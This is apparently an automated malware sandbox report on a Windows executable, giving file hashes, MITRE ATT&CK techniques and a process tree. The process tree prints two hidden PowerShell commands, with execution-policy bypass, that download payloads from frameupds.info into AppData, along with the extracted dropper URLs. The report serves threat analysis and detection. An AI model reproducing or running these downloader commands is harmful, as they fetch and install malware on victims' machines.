fa3f7a4c1502f499a481b56f5e7c185876626e3d00110d84e09652f98b776aff

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
27-11-2024 09:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
Size

212KB
MD5

43b55685945d2cecc170b850cf622038
SHA1

3b301a8a8a38dddd3cfb554b264342f9948102b0
SHA256

73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f
SHA512

ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65
SSDEEP

3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2936	powershell.exe
2872	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXE

pid	Process
2572	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2572	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2936	powershell.exe
2872	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.execmd.exe

description	pid	Process	procid_target
PID 2036 wrote to memory of 2816	2036	73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe	32
PID 2036 wrote to memory of 2816	2036	73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe	32
PID 2036 wrote to memory of 2816	2036	73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe	32
PID 2816 wrote to memory of 2572	2816	cmd.exe	34
PID 2816 wrote to memory of 2572	2816	cmd.exe	34
PID 2816 wrote to memory of 2572	2816	cmd.exe	34
PID 2816 wrote to memory of 2936	2816	cmd.exe	35
PID 2816 wrote to memory of 2936	2816	cmd.exe	35
PID 2816 wrote to memory of 2936	2816	cmd.exe	35
PID 2816 wrote to memory of 2872	2816	cmd.exe	36
PID 2816 wrote to memory of 2872	2816	cmd.exe	36
PID 2816 wrote to memory of 2872	2816	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
"C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\system32\PING.EXE
    ping localhost -n 6
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1495228552002e462ef08296bb6f0534

SHA1
55657dbc20503466618f818b6a1cf403076aa908

SHA256
c9ae92a9d3b77291212e042e5878422a9b778a0f07a1a4c021649532fc899215

SHA512
4bd1598638629a2fbf523413e9aa362e15c2a52e3d85f36a57a213e1b6f6d38a85d0a8e711805f0ed2e915ea5959f905ba272bd156791885107d2996e4d87cef

Download Submit
C:\Users\Admin\AppData\Roaming\ewqeq.cmd

Filesize
5KB

MD5
03868028bcd5c24c468e2c66571fb850

SHA1
c1dbed55b06bcc1b6a6211f7f8de592d92beb911

SHA256
c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

SHA512
d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

Download Submit
memory/2036-4-0x0000000001EE0000-0x0000000001EF0000-memory.dmp

Filesize
64KB

Download
memory/2872-18-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2872-19-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2936-10-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2936-11-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download
memory/2936-12-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download